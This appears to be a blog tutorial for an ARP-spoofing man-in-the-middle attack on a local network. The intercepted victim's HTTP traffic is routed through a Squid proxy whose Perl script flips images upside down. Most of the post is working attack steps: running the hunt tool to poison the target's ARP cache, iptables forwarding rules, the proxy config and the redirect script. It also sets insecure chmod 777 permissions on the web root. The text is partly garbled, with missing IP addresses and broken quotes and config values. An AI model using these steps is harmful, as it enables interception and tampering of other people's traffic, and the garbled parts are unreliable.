This is what we want to do: Make the target send all http packet to us instead of the gateway Forward them to the real gateway Modify the replay, with the  pictures upside- down Forward the replay to the target This is how we’re going to do it: 1 . Poison the ARP table of the target 2 . Set up our pc as a gateway router 3 . Send all http requests through a squid proxy 4 . Turn images upside-down with a squid script Ok, sound great, lets get started! 1. Poison the ARP table of the target We want the target to send all packets to us instead of the real gateway. To do this we need to know a little about ip addresses and mac addresses. When we wan to send a packet to 10. 0.0.1 , there is sent out an ARP request on the local lan, saying “Which computer is at”, then answers with an ARP repay “I am at , with mac address 11 :22 :33 :44 :55 :66 ″. Then we send the packet to 11 :22 :33 :44 :55 :66. ARP replays are cached in a local ARP table, so the next time we want to send to , we don’t need to ask who’s got it. We are going to send a  fake  ARP replay to the target ( , saying  we  are at Usually ARP replays are accepted even though no request was sent, so this is actually really easy. How do I do this? We can use  arpoison  to construct a fake packet and send it, but i prefer to use another a bit mor powerful script, called  hunt . You can download the hunt source code  here , and compile like this: tar zxvf hunt-1.5. tgz cd hunt-1.5 make If you’re not comfortable compiling yourself, you can download the one i compiled (i386)  here . Fire up hunt: sudo ./hunt In the menu system go to d) daemons rst/arp/sniff/mac a) arp spoof + arp relayer daemon i/I) insert single/range arp spoof s/k) start/stop relayer daemon (press s) Type in the ip of the real gateway, your mac address (find this by running ifconfig), and the targets ip. Now we have poisoned the ARP table of the target. You can confirm the poisoning by typing “arp -a” on the target, and see that the gateway ip has your mac address. 2. Set up our pc as a gateway router This is easy, just do this commands: sudo iptables -F sudo iptables -F -t nat sudo iptables -t nat -A POSTROUTING -o eth0 - j MASQUERADE echo 1 > /proc/sys/net/ipv4 /ip_forward Where eth0 is your network interface connected to the lan. The changes are reset the next time the network is reloaded. 3. Send all http requests through a squid proxy Install squid and reset it’s config: sudo apt-get squid sudo mv /etc/squid/squid.conf /etc/squid/squid. conf.default Edit /etc/squid/squid.conf with your favorite editor like this: http_port :8080 http_port :8080 visible_hostname gateway.my.flat cache_mgr proxy@foo.com httpd_accel_host virtual httpd_accel_port 80 httpd_accel_with_proxy on httpd_accel_uses_host_header on acl all src / http_access allow all redirect_program /var/redirect 4. Turn images upside-down with a squid script We use the redirect program defined in the squid config to flip our images, edit /var/redirect to look like this: #!/usr/bin/perl $|=1 ; $count = 0 ; $pid = $$; while (<>) { chomp $_; if ($_ =~ /(.*\.jpg)/i) { $url = $1 ; system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/ $pid-$count.jpg”, “$url”); system(”/usr/bin/mogrify”, “-flip”,”/var/www/ $pid-$count.jpg”); system(”/bin/chmod”, “777″, “/var/www/$pid- $count.jpg”); print “$pid-$count.jpg\n”; } elsif ($_ =~ /(.*\.gif)/i) { $url = $1 ; system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/ $pid-$count.gif”, “$url”); system(”/usr/bin/mogrify”, “-flip”,”/var/www/ $pid-$count.gif”); system(”/bin/chmod”, “777″, “/var/www/$pid- $count.gif”); print “$pid-$count.gif\n”; } else { print “$_\n”;; } $count++; } As you can see from the script, we need to serve the flipped images from a local webserver. Therefore, install apache : sudo apt-get install apache2 sudo chmod -R 777 /var/www At last, reload squid with the new configuration: sudo /etc/init.d/squid restart You can test the squid by configuring your  firefox  to use localhost:8080 as a proxy server. YOU HAVE NOW HACKED THE TARGET COMPUTER!

Post a Comment

M14 Network Inc. | Hassnain Arts